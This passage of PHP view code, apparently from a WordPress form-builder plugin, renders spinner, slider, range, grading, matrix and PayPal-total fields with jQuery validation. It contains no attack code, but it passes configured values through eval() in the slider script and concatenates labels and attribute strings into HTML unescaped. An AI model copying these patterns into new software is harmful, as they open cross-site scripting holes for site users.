                $rep.='<span class="wdform-required">'.$required_sym.'</span>';
              }
              $rep.='</div><div class="wdform-element-section '.$param['w_class'].'"  style="'.$param['w_field_label_pos2'].'"><input type="text" value="'.($param['w_field_value']!= 'null' ? $param['w_field_value'] : '').'" name="wdform_'.$id1.'_element'.$form_id.'" id="wdform_'.$id1.'_element'.$form_id.'" style="width: '.$param['w_field_width'].'px;" '.$param['attributes'].'></div></div>';              
              $onload_js .='
                jQuery("#form'.$form_id.' #wdform_'.$id1.'_element'.$form_id.'")[0].spin = null;
                spinner = jQuery("#form'.$form_id.' #wdform_'.$id1.'_element'.$form_id.'").spinner();
                spinner.spinner( "value", "'.($param['w_field_value']!= 'null' ? $param['w_field_value'] : '').'");
                jQuery("#form'.$form_id.' #wdform_'.$id1.'_element'.$form_id.'").spinner({ min: "'.$param['w_field_min_value'].'"});    
                jQuery("#form'.$form_id.' #wdform_'.$id1.'_element'.$form_id.'").spinner({ max: "'.$param['w_field_max_value'].'"});
                jQuery("#form'.$form_id.' #wdform_'.$id1.'_element'.$form_id.'").spinner({ step: "'.$param['w_field_step'].'"});
              ';

              if($required) {
                $check_js.='
                if(x.find(jQuery("div[wdid='.$id1.']")).length != 0 && x.find(jQuery("div[wdid='.$id1.']")).css("display") != "none")
                {
                  if(jQuery("#wdform_'.$id1.'_element'.$form_id.'").val()=="")
                  {
                    alert("' .addslashes($label. ' ' . __('field is required.', 'form_maker')) . '");
                    jQuery("#wdform_'.$id1.'_element'.$form_id.'").addClass( "form-error" );
                    old_bg=x.find(jQuery("div[wdid='.$id1.']")).css("background-color");
                    x.find(jQuery("div[wdid='.$id1.']")).effect( "shake", {}, 500 ).css("background-color","#FF8F8B").animate({backgroundColor: old_bg}, {duration: 500, queue: false });
                    jQuery("#wdform_'.$id1.'_element'.$form_id.'").focus();
                    jQuery("#wdform_'.$id1.'_element'.$form_id.'").change(function() { if( jQuery(this).val()!="" ) jQuery(this).removeClass("form-error"); else jQuery(this).addClass("form-error");});
                    return false;
                  }
                }
                ';		
              }
              break;
            }
            
            case 'type_slider': {
              $params_names=array('w_field_label_size','w_field_label_pos','w_field_width','w_field_min_value','w_field_max_value', 'w_field_value', 'w_required','w_class');
              $temp=$params;
              foreach($params_names as $params_name ) {
                $temp=explode('*:*'.$params_name.'*:*',$temp);
                $param[$params_name] = $temp[0];
                $temp=$temp[1];
              }
              if($temp) {	
                $temp	=explode('*:*w_attr_name*:*',$temp);
                $attrs	= array_slice($temp,0, count($temp)-1);   
                foreach($attrs as $attr) {
                  $param['attributes'] = $param['attributes'].' '.$attr;
                }
              }
              $param['w_field_label_pos1'] = ($param['w_field_label_pos']=="left" ? "float: left;" : "");	
              $param['w_field_label_pos2'] = ($param['w_field_label_pos']=="left" ? "" : "display:block;");
              $required = ($param['w_required']=="yes" ? true : false);	
              $param['w_field_value']=(isset($_POST['wdform_'.$id1.'_slider_value'.$form_id]) ? esc_html(stripslashes($_POST['wdform_'.$id1.'_slider_value'.$form_id])) : $param['w_field_value']);

              $rep ='<div type="type_slider" class="wdform-field"><div class="wdform-label-section '.$param['w_class'].'" style="'.$param['w_field_label_pos1'].' width: '.$param['w_field_label_size'].'px;"><span class="wdform-label">'.$label.'</span>';
              if($required) {
                $rep.='<span class="wdform-required">'.$required_sym.'</span>';
              }               
              $rep.='</div><div class="wdform-element-section '.$param['w_class'].'"  style="'.$param['w_field_label_pos2'].'"><input type="hidden" value="'.$param['w_field_value'].'" id="wdform_'.$id1.'_slider_value'.$form_id.'" name="wdform_'.$id1.'_slider_value'.$form_id.'"><div name="'.$id1.'_element'.$form_id.'" id="wdform_'.$id1.'_element'.$form_id.'" style="width: '.$param['w_field_width'].'px;" '.$param['attributes'].'"></div><div align="left" style="display: inline-block; width: 33.3%; text-align: left;"><span id="wdform_'.$id1.'_element_min'.$form_id.'" class="label">'.$param['w_field_min_value'].'</span></div><div align="right" style="display: inline-block; width: 33.3%; text-align: center;"><span id="wdform_'.$id1.'_element_value'.$form_id.'" class="label">'.$param['w_field_value'].'</span></div><div align="right" style="display: inline-block; width: 33.3%; text-align: right;"><span id="wdform_'.$id1.'_element_max'.$form_id.'" class="label">'.$param['w_field_max_value'].'</span></div></div></div>';
              $onload_js .='
                jQuery("#wdform_'.$id1.'_element'.$form_id.'")[0].slide = null;
                jQuery("#wdform_'.$id1.'_element'.$form_id.'").slider({
                  range: "min",
                  value: eval('.$param['w_field_value'].'),
                  min: eval('.$param['w_field_min_value'].'),
                  max: eval('.$param['w_field_max_value'].'),
                  slide: function( event, ui ) {	
                  
                    jQuery("#wdform_'.$id1.'_element_value'.$form_id.'").html("" + ui.value);
                    jQuery("#wdform_'.$id1.'_slider_value'.$form_id.'").val("" + ui.value);

                  }
                  });
              ';
              if($required) {
                $check_js.='
                if(x.find(jQuery("div[wdid='.$id1.']")).length != 0 && x.find(jQuery("div[wdid='.$id1.']")).css("display") != "none")
                {
                  if(jQuery("#wdform_'.$id1.'_slider_value'.$form_id.'").val()=='.$param['w_field_min_value'].')
                  {
                    alert("' .addslashes($label. ' ' . __('field is required.', 'form_maker')) . '");
                    old_bg=x.find(jQuery("div[wdid='.$id1.']")).css("background-color");
                    x.find(jQuery("div[wdid='.$id1.']")).effect( "shake", {}, 500 ).css("background-color","#FF8F8B").animate({backgroundColor: old_bg}, {duration: 500, queue: false });
                    return false;
                  }
                }
                ';		
              }
              break;
            }
            
            case 'type_range': {
              $params_names=array('w_field_label_size','w_field_label_pos','w_field_range_width','w_field_range_step','w_field_value1', 'w_field_value2', 'w_mini_labels', 'w_required','w_class');
              $temp=$params;
              foreach($params_names as $params_name ) {
                $temp=explode('*:*'.$params_name.'*:*',$temp);
                $param[$params_name] = $temp[0];
                $temp=$temp[1];
              }
              if($temp) {	
                $temp	=explode('*:*w_attr_name*:*',$temp);
                $attrs	= array_slice($temp,0, count($temp)-1);   
                foreach($attrs as $attr) {
                  $param['attributes'] = $param['attributes'].' '.$attr;
                }
              }
              $param['w_field_label_pos1'] = ($param['w_field_label_pos']=="left" ? "float: left;" : "");	
              $param['w_field_label_pos2'] = ($param['w_field_label_pos']=="left" ? "" : "display:block;");
              $required = ($param['w_required']=="yes" ? true : false);	
              $param['w_field_value1']=(isset($_POST['wdform_'.$id1.'_element'.$form_id.'0']) ? esc_html(stripslashes($_POST['wdform_'.$id1.'_element'.$form_id.'0'])) : $param['w_field_value1']);
              $param['w_field_value2']=(isset($_POST['wdform_'.$id1.'_element'.$form_id.'1']) ? esc_html(stripslashes($_POST['wdform_'.$id1.'_element'.$form_id.'1'])) : $param['w_field_value2']);

              $w_mini_labels = explode('***',$param['w_mini_labels']);              
              $rep ='<div type="type_range" class="wdform-field"><div class="wdform-label-section '.$param['w_class'].'" style="'.$param['w_field_label_pos1'].' width: '.$param['w_field_label_size'].'px;"><span class="wdform-label">'.$label.'</span>';
              if($required) {
                $rep.='<span class="wdform-required">'.$required_sym.'</span>';
              }
              $rep.='</div><div class="wdform-element-section '.$param['w_class'].'"  style="'.$param['w_field_label_pos2'].'"><div style="display: table;"><div style="display: table-row;"><div valign="middle" align="left" style="display: table-cell;"><input type="text" value="'.($param['w_field_value1']!= 'null' ? $param['w_field_value1'] : '').'" name="wdform_'.$id1.'_element'.$form_id.'0" id="wdform_'.$id1.'_element'.$form_id.'0" style="width: '.$param['w_field_range_width'].'px;"  '.$param['attributes'].'></div><div valign="middle" align="left" style="display: table-cell; padding-left: 4px;"><input type="text" value="'.($param['w_field_value2']!= 'null' ? $param['w_field_value2'] : '').'" name="wdform_'.$id1.'_element'.$form_id.'1" id="wdform_'.$id1.'_element'.$form_id.'1" style="width: '.$param['w_field_range_width'].'px;" '.$param['attributes'].'></div></div><div style="display: table-row;"><div valign="top" align="left" style="display: table-cell;"><label class="mini_label" id="wdform_'.$id1.'_mini_label_from">'.$w_mini_labels[0].'</label></div><div valign="top" align="left" style="display: table-cell;"><label class="mini_label" id="wdform_'.$id1.'_mini_label_to">'.$w_mini_labels[1].'</label></div></div></div></div></div>';
              $onload_js .='
                jQuery("#form'.$form_id.' #wdform_'.$id1.'_element'.$form_id.'0")[0].spin = null;
                jQuery("#form'.$form_id.' #wdform_'.$id1.'_element'.$form_id.'1")[0].spin = null;
                
                spinner0 = jQuery("#form'.$form_id.' #wdform_'.$id1.'_element'.$form_id.'0").spinner();
                spinner0.spinner( "value", "'.($param['w_field_value1']!= 'null' ? $param['w_field_value1'] : '').'");
                jQuery("#form'.$form_id.' #wdform_'.$id1.'_element'.$form_id.'").spinner({ step: '.$param['w_field_range_step'].'});
                
                spinner1 = jQuery("#form'.$form_id.' #wdform_'.$id1.'_element'.$form_id.'1").spinner();
                spinner1.spinner( "value", "'.($param['w_field_value2']!= 'null' ? $param['w_field_value2'] : '').'");
                jQuery("#form'.$form_id.' #wdform_'.$id1.'_element'.$form_id.'").spinner({ step: '.$param['w_field_range_step'].'});
              ';
              
              if($required) {
                $check_js.='
                if(x.find(jQuery("div[wdid='.$id1.']")).length != 0 && x.find(jQuery("div[wdid='.$id1.']")).css("display") != "none")
                {
                  if(jQuery("#wdform_'.$id1.'_element'.$form_id.'0").val()=="" || jQuery("#wdform_'.$id1.'_element'.$form_id.'1").val()=="")
                  {
                    alert("' .addslashes($label. ' ' . __('field is required.', 'form_maker')) . '");
                    old_bg=x.find(jQuery("div[wdid='.$id1.']")).css("background-color");
                    x.find(jQuery("div[wdid='.$id1.']")).effect( "shake", {}, 500 ).css("background-color","#FF8F8B").animate({backgroundColor: old_bg}, {duration: 500, queue: false });
                    jQuery("#wdform_'.$id1.'_element'.$form_id.'0").focus();
                    return false;
                  }
                }
                ';		
              }
              break;
            }
            
            case 'type_grading': {
              $params_names=array('w_field_label_size','w_field_label_pos', 'w_items', 'w_total', 'w_required','w_class');
              $temp=$params;
              foreach($params_names as $params_name ) {
                $temp=explode('*:*'.$params_name.'*:*',$temp);
                $param[$params_name] = $temp[0];
                $temp=$temp[1];
              }
              if($temp) {
                $temp	=explode('*:*w_attr_name*:*',$temp);
                $attrs	= array_slice($temp,0, count($temp)-1);   
                foreach($attrs as $attr) {
                  $param['attributes'] = $param['attributes'].' '.$attr;
                }
              }
              $param['w_field_label_pos1'] = ($param['w_field_label_pos']=="left" ? "float: left;" : "");	
              $param['w_field_label_pos2'] = ($param['w_field_label_pos']=="left" ? "" : "display:block;");
              $required = ($param['w_required']=="yes" ? true : false);	
              
              $w_items = explode('***',$param['w_items']);
              $required_check='true';
              $w_items_labels =implode(':',$w_items);              
              $grading_items ='';
            
              for($i=0; $i<count($w_items); $i++) {
                $value=(isset($_POST['wdform_'.$id1.'_element'.$form_id.'_'.$i]) ? esc_html(stripslashes($_POST['wdform_'.$id1.'_element'.$form_id.'_'.$i])) : '');
                $grading_items .= '<div class="wdform_grading"><input type="text" id="wdform_'.$id1.'_element'.$form_id.'_'.$i.'" name="wdform_'.$id1.'_element'.$form_id.'_'.$i.'"  value="'.$value.'" '.$param['attributes'].'><label class="wdform-ch-rad-label" for="wdform_'.$id1.'_element'.$form_id.'_'.$i.'">'.$w_items[$i].'</label></div>';
                $required_check.=' && jQuery("#wdform_'.$id1.'_element'.$form_id.'_'.$i.'").val()==""';
              }                
              $rep ='<div type="type_grading" class="wdform-field"><div class="wdform-label-section '.$param['w_class'].'" style="'.$param['w_field_label_pos1'].' width: '.$param['w_field_label_size'].'px;"><span class="wdform-label">'.$label.'</span>';
              if($required) {
                $rep.='<span class="wdform-required">'.$required_sym.'</span>';
              }                
              $rep.='</div><div class="wdform-element-section '.$param['w_class'].'"  style="'.$param['w_field_label_pos2'].'"><input type="hidden" value="'.$param['w_total'].'" name="wdform_'.$id1.'_grading_total'.$form_id.'" id="wdform_'.$id1.'_grading_total'.$form_id.'"><div id="wdform_'.$id1.'_element'.$form_id.'">'.$grading_items.'<div id="wdform_'.$id1.'_element_total_div'.$form_id.'" class="grading_div">Total: <span id="wdform_'.$id1.'_sum_element'.$form_id.'">0</span>/<span id="wdform_'.$id1.'_total_element'.$form_id.'">'.$param['w_total'].'</span><span id="wdform_'.$id1.'_text_element'.$form_id.'"></span></div></div></div></div>';              
              $onload_js.='
              jQuery("#wdform_'.$id1.'_element'.$form_id.' input").change(function() {sum_grading_values("wdform_'.$id1.'",'.$form_id.');});';              
              $onload_js.='
              jQuery("#wdform_'.$id1.'_element'.$form_id.' input").keyup(function() {sum_grading_values("wdform_'.$id1.'",'.$form_id.');});';              
              $onload_js.='
              jQuery("#wdform_'.$id1.'_element'.$form_id.' input").keyup(function() {sum_grading_values("wdform_'.$id1.'",'.$form_id.');});';              
              $onload_js.='
              sum_grading_values("wdform_'.$id1.'",'.$form_id.');';
              if($required) {
                $check_js.='
                if(x.find(jQuery("div[wdid='.$id1.']")).length != 0 && x.find(jQuery("div[wdid='.$id1.']")).css("display") != "none")
                {
                  if('.$required_check.')
                  {
                    alert("' .addslashes($label. ' ' . __('field is required.', 'form_maker')) . '");
                    old_bg=x.find(jQuery("div[wdid='.$id1.']")).css("background-color");
                    x.find(jQuery("div[wdid='.$id1.']")).effect( "shake", {}, 500 ).css("background-color","#FF8F8B").animate({backgroundColor: old_bg}, {duration: 500, queue: false });
                    jQuery("#wdform_'.$id1.'_element'.$form_id.'0").focus();
                    return false;
                  }
                }
                ';		
              }
              $check_js.='
              if(x.find(jQuery("div[wdid='.$id1.']")).length != 0 && x.find(jQuery("div[wdid='.$id1.']")).css("display") != "none")
              {
                if(parseInt(jQuery("#wdform_'.$id1.'_sum_element'.$form_id.'").html()) > '.$param['w_total'].')
                {
                  alert("' . addslashes(__("Your score should be less than", 'form_maker')) . $param['w_total'] . '");
                  return false;
                }
              }
              ';		
              
              $onsubmit_js.='
                jQuery("<input type=\"hidden\" name=\"wdform_'.$id1.'_hidden_item'.$form_id.'\" value = \"'.$w_items_labels.':'.$param['w_total'].'\" />").appendTo("#form'.$form_id.'");
                ';              
              break;
            }
            case 'type_matrix': {
              $params_names=array('w_field_label_size','w_field_label_pos', 'w_field_input_type', 'w_rows', 'w_columns', 'w_required','w_class','w_textbox_size');
              $temp=$params;
              foreach($params_names as $params_name ) {
                $temp=explode('*:*'.$params_name.'*:*',$temp);
                $param[$params_name] = $temp[0];
                $temp=$temp[1];
              }
              if($temp) {	
                $temp	=explode('*:*w_attr_name*:*',$temp);
                $attrs	= array_slice($temp,0, count($temp)-1);   
                foreach($attrs as $attr) {
                  $param['attributes'] = $param['attributes'].' '.$attr;
                }
              }              
              $param['w_field_label_pos1'] = ($param['w_field_label_pos']=="left" ? "float: left;" : "");	
              $param['w_field_label_pos2'] = ($param['w_field_label_pos']=="left" ? "" : "display:block;");
              $required = ($param['w_required']=="yes" ? true : false);	
              $param['w_textbox_size'] = isset($param['w_textbox_size']) ? $param['w_textbox_size'] : '120';            
              $w_rows = explode('***',$param['w_rows']);
              $w_columns = explode('***',$param['w_columns']);
              $column_labels ='';
            
              for($i=1; $i<count($w_columns); $i++) {
                $column_labels .= '<div><label class="wdform-ch-rad-label">'.$w_columns[$i].'</label></div>';
              }              
              $rows_columns = '';
              for($i=1; $i<count($w_rows); $i++) {              
                $rows_columns .= '<div class="wdform-matrix-row'.($i%2).'" row="'.$i.'"><div class="wdform-matrix-column"><label class="wdform-ch-rad-label" >'.$w_rows[$i].'</label></div>';
                for($k=1; $k<count($w_columns); $k++) {
                  $rows_columns .= '<div class="wdform-matrix-cell">';
                  if($param['w_field_input_type']=='radio') {
                    $to_check=0;
                    $post_value = isset($_POST['wdform_'.$id1.'_input_element'.$form_id.''.$i]) ? esc_html(stripslashes($_POST['wdform_'.$id1.'_input_element'.$form_id.''.$i])) : NULL;
                    if(isset($post_value)) {
                      $to_check=$post_value;	
                    }
                    $rows_columns .= '<div class="radio-div"><input id="wdform_'.$id1.'_input_element'.$form_id.''.$i.'_'.$k.'"  type="radio" name="wdform_'.$id1.'_input_element'.$form_id.''.$i.'" value="'.$i.'_'.$k.'" '.($to_check==$i.'_'.$k ? 'checked="checked"' : '').'><label for="wdform_'.$id1.'_input_element'.$form_id.''.$i.'_'.$k.'"></label></div>';                    
                  }
                  else {
                    if($param['w_field_input_type']=='checkbox') {
                      $to_check=0;
                      $post_value = isset($_POST['wdform_'.$id1.'_input_element'.$form_id.''.$i.'_'.$k]) ? esc_html(stripslashes($_POST['wdform_'.$id1.'_input_element'.$form_id.''.$i.'_'.$k])) : NULL;
                      if(isset($post_value)) {
                        $to_check=$post_value;	
                      }
                      $rows_columns .= '<div class="checkbox-div"><input id="wdform_'.$id1.'_input_element'.$form_id.''.$i.'_'.$k.'" type="checkbox" name="wdform_'.$id1.'_input_element'.$form_id.''.$i.'_'.$k.'" value="1" '.($to_check=="1" ? 'checked="checked"' : '').'><label for="wdform_'.$id1.'_input_element'.$form_id.''.$i.'_'.$k.'"></label></div>';
                    }
                    else {
                      if($param['w_field_input_type']=='text') {
                        $rows_columns .= '<input id="wdform_'.$id1.'_input_element'.$form_id.''.$i.'_'.$k.'" type="text" name="wdform_'.$id1.'_input_element'.$form_id.''.$i.'_'.$k.'" value="'.(isset($_POST['wdform_'.$id1.'_input_element'.$form_id.''.$i.'_'.$k]) ? esc_html(stripslashes($_POST['wdform_'.$id1.'_input_element'.$form_id.''.$i.'_'.$k])) : "").'" style="width:'.$param['w_textbox_size'].'px">';
                      }
                      else {
                        if($param['w_field_input_type']=='select') {
                          $rows_columns .= '<select id="wdform_'.$id1.'_select_yes_no'.$form_id.''.$i.'_'.$k.'" name="wdform_'.$id1.'_select_yes_no'.$form_id.''.$i.'_'.$k.'" ><option value="" '.(isset($_POST['wdform_'.$id1.'_select_yes_no'.$form_id.''.$i.'_'.$k]) && esc_html($_POST['wdform_'.$id1.'_select_yes_no'.$form_id.''.$i.'_'.$k]) == "" ? "selected=\"selected\"": "").'> </option><option value="yes" '.(isset($_POST['wdform_'.$id1.'_select_yes_no'.$form_id.''.$i.'_'.$k]) && esc_html($_POST['wdform_'.$id1.'_select_yes_no'.$form_id.''.$i.'_'.$k]) == "yes" ? "selected=\"selected\"": "").'>Yes</option><option value="no" '.(isset($_POST['wdform_'.$id1.'_select_yes_no'.$form_id.''.$i.'_'.$k]) && esc_html($_POST['wdform_'.$id1.'_select_yes_no'.$form_id.''.$i.'_'.$k]) == "no" ? "selected=\"selected\"": "").'>No</option></select>';
                        }
                      }
                    }
                  }
                  $rows_columns.='</div>';
                } 
                $rows_columns .= '</div>';	
              }
                
              $rep ='<div type="type_matrix" class="wdform-field"><div class="wdform-label-section '.$param['w_class'].'" style="'.$param['w_field_label_pos1'].' width: '.$param['w_field_label_size'].'px;"><span class="wdform-label">'.$label.'</span>';
              if($required) {
                $rep.='<span class="wdform-required">'.$required_sym.'</span>';
              }                
              $rep.='</div><div class="wdform-element-section '.$param['w_class'].'"  style="'.$param['w_field_label_pos2'].'"><div id="wdform_'.$id1.'_element'.$form_id.'" class="wdform-matrix-table" '.$param['attributes'].'><div style="display: table-row-group;"><div class="wdform-matrix-head"><div style="display: table-cell;"></div>'.$column_labels.'</div>'.$rows_columns.'</div></div></div></div>';              
              $onsubmit_js.='
                jQuery("<input type=\"hidden\" name=\"wdform_'.$id1.'_input_type'.$form_id.'\" value = \"'.$param['w_field_input_type'].'\" /><input type=\"hidden\" name=\"wdform_'.$id1.'_hidden_row'.$form_id.'\" value = \"'.addslashes($param['w_rows']).'\" /><input type=\"hidden\" name=\"wdform_'.$id1.'_hidden_column'.$form_id.'\" value = \"'.addslashes($param['w_columns']).'\" />").appendTo("#form'.$form_id.'");
                ';
              if($required) {
                if($param['w_field_input_type']=='radio') {
                  $check_js.='
                  if(x.find(jQuery("div[wdid='.$id1.']")).length != 0 && x.find(jQuery("div[wdid='.$id1.']")).css("display") != "none")
                  {
                    var radio_checked=true;
                    for(var k=1; k<'.count($w_rows).';k++)
                    {
                      if(x.find(jQuery("div[wdid='.$id1.']")).find(jQuery("div[row="+k+"]")).find(jQuery("input[type=\'radio\']:checked")).length == 0)
                      {
                        radio_checked=false;
                        break;
                      }
                    }
                    
                    if(radio_checked==false)
                    {
                      alert("' .addslashes($label. ' ' . __('field is required.', 'form_maker')) . '");
                      old_bg=x.find(jQuery("div[wdid='.$id1.']")).css("background-color");
                      x.find(jQuery("div[wdid='.$id1.']")).effect( "shake", {}, 500 ).css("background-color","#FF8F8B").animate({backgroundColor: old_bg}, {duration: 500, queue: false });
                      return false;
                    }
                  }
                  ';		
                }                
                if($param['w_field_input_type']=='checkbox') {
                  $check_js.='
                  if(x.find(jQuery("div[wdid='.$id1.']")).length != 0 && x.find(jQuery("div[wdid='.$id1.']")).css("display") != "none")
                  {
                    if(x.find(jQuery("div[wdid='.$id1.']")).find(jQuery("input[type=\'checkbox\']:checked")).length == 0)
                    {
                      alert("' .addslashes($label. ' ' . __('field is required.', 'form_maker')) . '");
                      old_bg=x.find(jQuery("div[wdid='.$id1.']")).css("background-color");
                      x.find(jQuery("div[wdid='.$id1.']")).effect( "shake", {}, 500 ).css("background-color","#FF8F8B").animate({backgroundColor: old_bg}, {duration: 500, queue: false });
                      return false;
                    }
                  }
                  
                  ';		
                }                
                if($param['w_field_input_type']=='text') {
                  $check_js.='
                  if(x.find(jQuery("div[wdid='.$id1.']")).length != 0 && x.find(jQuery("div[wdid='.$id1.']")).css("display") != "none")
                  {
                    if(x.find(jQuery("div[wdid='.$id1.']")).find(jQuery("input[type=\'text\']")).filter(function() {return this.value.length !== 0;}).length == 0)
                    {
                      alert("' .addslashes($label. ' ' . __('field is required.', 'form_maker')) . '");
                      old_bg=x.find(jQuery("div[wdid='.$id1.']")).css("background-color");
                      x.find(jQuery("div[wdid='.$id1.']")).effect( "shake", {}, 500 ).css("background-color","#FF8F8B").animate({backgroundColor: old_bg}, {duration: 500, queue: false });
                      return false;
                    }
                  }                  
                  ';		
                }
                
                if($param['w_field_input_type']=='select') {
                  $check_js.='
                  if(x.find(jQuery("div[wdid='.$id1.']")).length != 0 && x.find(jQuery("div[wdid='.$id1.']")).css("display") != "none")
                  {
                    if(x.find(jQuery("div[wdid='.$id1.']")).find(jQuery("select")).filter(function() {return this.value.length !== 0;}).length == 0)
                    {
                      alert("' .addslashes($label. ' ' . __('field is required.', 'form_maker')) . '");
                      old_bg=x.find(jQuery("div[wdid='.$id1.']")).css("background-color");
                      x.find(jQuery("div[wdid='.$id1.']")).effect( "shake", {}, 500 ).css("background-color","#FF8F8B").animate({backgroundColor: old_bg}, {duration: 500, queue: false });
                      return false;
                    }
                  }
                  
                  ';		
                }
              }
              break;
            }
          
            case 'type_paypal_total': {
              $params_names=array('w_field_label_size','w_field_label_pos','w_class');
              $temp=$params;
              foreach($params_names as $params_name ) {
                $temp=explode('*:*'.$params_name.'*:*',$temp);
                $param[$params_name] = $temp[0];
                $temp=$temp[1];
              }
              if($temp) {	
                $temp	=explode('*:*w_attr_name*:*',$temp);
                $attrs	= array_slice($temp,0, count($temp)-1);   
                foreach($attrs as $attr) {
                  $param['attributes'] = $param['attributes'].' '.$attr;
                }
              }              
              $param['w_field_label_pos1'] = ($param['w_field_label_pos']=="left" ? "float: left;" : "");	
              $param['w_field_label_pos2'] = ($param['w_field_label_pos']=="left" ? "" : "display:block;");                    
              $rep ='<div type="type_paypal_total" class="wdform-field"><div class="wdform-label-section '.$param['w_class'].'" style="'.$param['w_field_label_pos1'].' width: '.$param['w_field_label_size'].'px;"><span class="wdform-label">'.$label.'</span>';                      
              $rep.='</div><div class="wdform-element-section '.$param['w_class'].'"  style="'.$param['w_field_label_pos2'].'"><div id="wdform_'.$id1.'paypal_total'.$form_id.'" class="wdform_paypal_total paypal_total'.$form_id.'"><input type="hidden" value="" name="wdform_'.$id1.'_paypal_total'.$form_id.'" class="input_paypal_total'.$form_id.'"><div id="wdform_'.$id1.'div_total'.$form_id.'" class="div_total'.$form_id.'" style="margin-bottom: 10px;"></div><div id="wdform_'.$id1.'paypal_products'.$form_id.'" class="paypal_products'.$form_id.'" style="border-spacing: 2px;"><div style="border-spacing: 2px;"></div><div style="border-spacing: 2px;"></div></div><div id="wdform_'.$id1.'paypal_tax'.$form_id.'" class="paypal_tax'.$form_id.'" style="border-spacing: 2px; margin-top: 7px;"></div></div></div></div>';            
              $onload_js .='set_total_value('.$form_id.');';
              break;
            }
          }          
          $form=str_replace('%'.$id1.' - '.$labels[$id1s_key].'%', $rep, $form);
          $form=str_replace('%'.$id1.' -'.$labels[$id1s_key].'%', $rep, $form);
        }        
      }
      
      $onsubmit_js.='
        var disabled_fields ="";	
        jQuery("div[wdid]").each(function() {
          if(jQuery(this).css("display")=="none")
          {		
            disabled_fields += jQuery(this).attr("wdid");
            disabled_fields += ",";
          }	

            if(disabled_fields)
            jQuery("<input type=\"hidden\" name=\"disabled_fields'.$form_id.'\" value =\""+disabled_fields+"\" />").appendTo("#form'.$form_id.'");
            
        })';
      
      $rep1=array('form_id_temp');
      $rep2=array($id);

      $form = str_replace($rep1,$rep2,$form);

      $form_maker_front_end .= $form;
      $form_maker_front_end .= '<div class="wdform_preload"></div>';
      $form_maker_front_end .= '</form>';
    ?>
    <script type="text/javascript">
		var plugin_url = "<?php echo WD_FMC_URL; ?>";
      WDF_GRADING_TEXT ='<?php echo addslashes(__("Your score should be less than", 'form_maker')); ?>'; 
      WDF_INVALID_GRADING_<?php echo $id; ?> 	= '<?php echo addslashes(sprintf(__("Your score should be less than", 'form_maker'), '`grading_label`', '`grading_total`')); ?>';
      FormCurrency_<?php echo $id; ?> = '<?php echo $form_currency ?>';  
      FormPaypalTax_<?php echo $id; ?> = '<?php echo $form_paypal_tax ?>';  

      function formOnload<?php echo $id; ?>() {
        if (navigator.userAgent.toLowerCase().indexOf('msie') != -1 && parseInt(navigator.userAgent.toLowerCase().split('msie')[1]) === 8) {
          jQuery("#form<?php echo $id; ?>").find(jQuery("input[type='radio']")).click(function() {jQuery("input[type='radio']+label").removeClass('if-ie-div-label'); jQuery("input[type='radio']:checked+label").addClass('if-ie-div-label')});	
          jQuery("#form<?php echo $id; ?>").find(jQuery("input[type='radio']:checked+label")).addClass('if-ie-div-label');
          jQuery("#form<?php echo $id; ?>").find(jQuery("input[type='checkbox']")).click(function() {jQuery("input[type='checkbox']+label").removeClass('if-ie-div-label'); jQuery("input[type='checkbox']:checked+label").addClass('if-ie-div-label')});	
          jQuery("#form<?php echo $id; ?>").find(jQuery("input[type='checkbox']:checked+label")).addClass('if-ie-div-label');
        }

        jQuery("div[type='type_text'] input, div[type='type_number'] input, div[type='type_phone'] input, div[type='type_name'] input, div[type='type_submitter_mail'] input, div[type='type_paypal_price'] input, div[type='type_textarea'] textarea").focus(function() {delete_value(this)}).blur(function() {return_value(this)});
        jQuery("div[type='type_number'] input, div[type='type_phone'] input, div[type='type_spinner'] input, div[type='type_range'] input, .wdform-quantity").keypress(function(evt) {return check_isnum(evt)});
        
        jQuery("div[type='type_grading'] input").keypress(function(evt) {return check_isnum_or_minus(evt)});
        
        jQuery("div[type='type_paypal_checkbox'] input[type='checkbox'], div[type='type_paypal_radio'] input[type='radio'], div[type='type_paypal_shipping'] input[type='radio']").click(function() {set_total_value(<?php echo $form_id; ?>)});
        jQuery("div[type='type_paypal_select'] select, div[type='type_paypal_price'] input").change(function() {set_total_value(<?php echo $form_id; ?>)});
        jQuery(".wdform-quantity").change(function() {set_total_value(<?php echo $form_id; ?>)});

        jQuery("div[type='type_address'] select").change(function() {set_total_value(<?php echo $form_id; ?>)});
        
        jQuery("div[type='type_time'] input").blur(function() {add_0(this)});

        jQuery('.wdform-element-section').each(function() {
          if(!jQuery(this).parent()[0].style.width && parseInt(jQuery(this).width())!=0)
          {
            
            if(jQuery(this).css('display')=="table-cell")
            {
              if(jQuery(this).parent().attr('type')!="type_captcha")
                jQuery(this).parent().css('width', parseInt(jQuery(this).width()) + parseInt(jQuery(this).parent().find(jQuery(".wdform-label-section"))[0].style.width)+15);
              else
                jQuery(this).parent().css('width', (parseInt(jQuery(this).parent().find(jQuery(".captcha_input"))[0].style.width)*2+50) + parseInt(jQuery(this).parent().find(jQuery(".wdform-label-section"))[0].style.width)+15);
            }
          }
          if (!jQuery(this).parent()[0].style.width && parseInt(jQuery(this).width()) != 0) {
            if (jQuery(this).css('display') == "table-cell") {
              if (jQuery(this).parent().attr('type') != "type_captcha") {
                jQuery(this).parent().css('width', parseInt(jQuery(this).width()) + parseInt(jQuery(this).parent().find(jQuery(".wdform-label-section"))[0].style.width)+15);
              }
              else {
                jQuery(this).parent().css('width', (parseInt(jQuery(this).parent().find(jQuery(".captcha_input"))[0].style.width)*2+50) + parseInt(jQuery(this).parent().find(jQuery(".wdform-label-section"))[0].style.width)+15);
              }
            }
          }
          if(parseInt(jQuery(this)[0].style.width.replace('px', '')) < parseInt(jQuery(this).css('min-width').replace('px', '')))
            jQuery(this).css('min-width', parseInt(jQuery(this)[0].style.width.replace('px', ''))-10);
        });	
        
        jQuery('.wdform-label').each(function() {
          if(parseInt(jQuery(this).height()) >= 2*parseInt(jQuery(this).css('line-height').replace('px', '')))
          {
            jQuery(this).parent().css('max-width',jQuery(this).parent().width());
            jQuery(this).parent().css('width','');
          }
        });
        
        (function(jQuery){
          jQuery.fn.shuffle = function() {
            var allElems = this.get(),
              getRandom = function(max) {
                return Math.floor(Math.random() * max);
              },
              shuffled = jQuery.map(allElems, function(){
                var random = getRandom(allElems.length),
                  randEl = jQuery(allElems[parseInt(random)]).clone(true)[0];
                allElems.splice(random, 1);
                return randEl;
               });
            this.each(function(i){
              jQuery(this).replaceWith(jQuery(shuffled[i]));
            });
            return jQuery(shuffled);
          };
        })(jQuery);
        
        <?php echo $onload_js; ?>
        <?php echo $condition_js; ?>
        
        if(window.before_load)
        {
          before_load();
        }
      }

      jQuery(window).load(function () {
